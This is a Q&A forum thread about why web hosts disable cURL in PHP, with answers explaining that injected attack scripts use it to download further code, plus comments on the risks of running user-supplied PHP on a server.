Many hosts use to disable cURL because of "some" security reasons.
I'm looking for these reasons. A quick google lookup didn't give me an in-depth information.
Asked
Active
Viewed 458 times
3 Answers
2
Many infections (especially botnet types and some admin-shell types) that abuse arbitrary code execution vulnerabilities will inject a small payload script that then uses cURL or wget to download further instructions and configuration. It may be for blocked in attempt to limit the impact of these robotic attacks.
Cheekysoft
- 35,194
- 20
- 73
- 86
-
So, Curl itself is not the problem, it is the code retrieved, right? – Sebas Jan 31 '14 at 18:35
-
@Sebas The real problem is how an attacker was able to execute arbitrary commands on your system in the first place. Smart enough exploits will always be able to work around various binaries being unavailable on the target system. – Cheekysoft Feb 03 '14 at 09:40
-
In my case I'm interested in this subject because I open a frame for the users to enter their own php code executed on the server. I'm evaluating the risks of having cURL activated, which is necessary for SOAP operations I need to allow. – Sebas Feb 03 '14 at 16:27
-
@Sebas, you already have an arbitrary remote code execution vulnerability, by design; why worry about curl? So many functions in PHP are exceptionally dangerous to allow unchecked arguments to pass into. Are you familiar with http://stackoverflow.com/a/3697776/1820 ? See also http://security.stackexchange.com/a/1407/5086 – Cheekysoft Feb 03 '14 at 16:46
-
Yes of course I disabled all these functions. I was thinking that cURL is probably not that dangerous so I came here to double check. – Sebas Feb 03 '14 at 23:51
1
I remember there were some bugs in cURL with PHP version but it was long time ago and all used PHP versions now have no cURL exploits
Mohamed Atef
- 196
- 1
- 2
- 12
0
I guess, real reason is not security, but rather financial ;) Once you pay them - there is no problem with cURL anymore.
c69
- 19,951
- 7
- 52
- 82